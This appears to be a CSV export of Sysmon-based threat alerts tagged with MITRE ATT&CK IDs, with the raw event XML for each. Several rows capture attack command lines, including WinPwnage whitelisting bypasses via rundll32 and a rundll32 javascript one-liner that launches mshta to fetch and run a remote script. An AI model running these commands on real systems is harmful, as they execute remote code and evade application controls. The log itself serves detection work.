"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1558452779.389278,2019-05-21T19:32:59.389278+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);) in directory : ( C:\Users\IEUser\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.867089Z"">
</TimeCreated>
<EventRecordID>4127</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.837</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; https://hotelesms.com/talsk.txt</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ParentProcessId"">2920</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1059 ] wscript or cscript runing script,1634833622.319552,2021-10-21T20:27:02.319552+04:00,,Threat,High,"Found User (LAPTOP-JU4M3I0E\bouss) Trying to run wscript or cscript with Command Line (cscript.exe //e:jscript testme.js) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\System32\cmd.exe&quot;) in directory : ( C:\Users\bouss\Desktop\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-10-21T16:27:02.319552Z"">
</TimeCreated>
<EventRecordID>10920364</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5396"" ThreadID=""7692"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-10-21 16:27:02.278</Data>
<Data Name=""ProcessGuid"">00247C92-94D6-6171-0000-00100514967B</Data>
<Data Name=""ProcessId"">28176</Data>
<Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
<Data Name=""FileVersion"">5.812.10240.16384</Data>
<Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
<Data Name=""Product"">Microsoft ® Windows Script Host</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">cscript.exe</Data>
<Data Name=""CommandLine"">cscript.exe //e:jscript testme.js</Data>
<Data Name=""CurrentDirectory"">C:\Users\bouss\Desktop\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-3C1A-6169-0000-0020C2790700</Data>
<Data Name=""LogonId"">0x779c2</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=C3D511D4CF77C50D00A5264C6BB3AE44E5008831,MD5=B8454647EFC71192BF7B1572D18F7BD8,SHA256=C69648B049E35FF96523C911737A0481D52DD06508A561094A4FA895A30A6535,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
<Data Name=""ParentProcessGuid"">00247C92-85C9-6170-0000-001008E62B6B</Data>
<Data Name=""ParentProcessId"">24148</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.662701,2019-05-27T05:29:18.662701+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.662701Z"">
</TimeCreated>
<EventRecordID>5931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.622</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010EF9EFF00</Data>
<Data Name=""ProcessId"">3756</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
